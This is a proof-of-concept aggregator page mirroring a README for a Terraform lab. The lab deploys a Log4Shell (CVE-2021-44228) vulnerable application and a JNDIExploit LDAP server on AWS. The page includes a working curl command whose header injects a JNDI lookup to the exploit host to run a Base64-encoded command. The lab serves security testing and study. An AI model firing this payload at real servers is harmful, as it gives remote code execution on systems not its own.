POC详情: 6780f4ff2e3a6a378907c43c88f51a11d8181cb3

来源
https://github.com/mkhazamipour/log4j-vulnerable-app-cve-2021-44228-terraform
关联漏洞
标题: Apache Log4j 代码问题漏洞 (CVE-2021-44228)
描述:Apache Log4j是美国阿帕奇(Apache)基金会的一款基于Java的开源日志记录工具。 Apache Log4J 存在代码问题漏洞,攻击者可设计一个数据请求发送给使用 Apache Log4j工具的服务器,当该请求被打印成日志时就会触发远程代码执行。
描述
A Terraform to deploy vulnerable app and a JDNIExploit to work with CVE-2021-44228
介绍
# log4j-vulnerable-app-cve-2021-44228-terraform
A Terraform to deploy vulnerable app and a JNDIExploit to work with CVE-2021-44228

# About Stack

This terraform creates two instances on a VPC in AWS Cloud.


You just need to export your **AWS_ACCESS_KEY_ID** and **AWS_SECRET_ACCESS_KEY**


One instance is [JNDIExploit](https://github.com/feihong-cs/JNDIExploit).


Second is a [Vulnerable-App](https://github.com/christophetd/log4shell-vulnerable-app) to log4j exploit


**Please replace your SSH-Public-Key in terraform before apply**

```bash
terraform init
terraform plan
terraform apply --auto-approve
```

# Exploit

After deployment on aws you can exploit it with curl request, and verify file creation in /tmp on the vulnerable-app container.

```bash
curl ${vulnerable-app-IP}:8090 -H 'X-Api-Version: ${jndi:ldap://${JNDIExploit-IP}:1389/Basic/Command/Base64/dG91Y2ggL3RtcC9wd25lZAo=}'
```

On the vulnerable app server run the following command to verify command execution, you should see **pwned** file
```bash
sudo docker exec -ti vulnerable-app ls /tmp
```
文件快照

 [4.0K]  /data/pocs/6780f4ff2e3a6a378907c43c88f51a11d8181cb3
├── [3.6K]  main.tf
├── [ 115]  providers.tf
├── [1.0K]  README.md
└── [ 217]  variables.tf

0 directories, 4 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。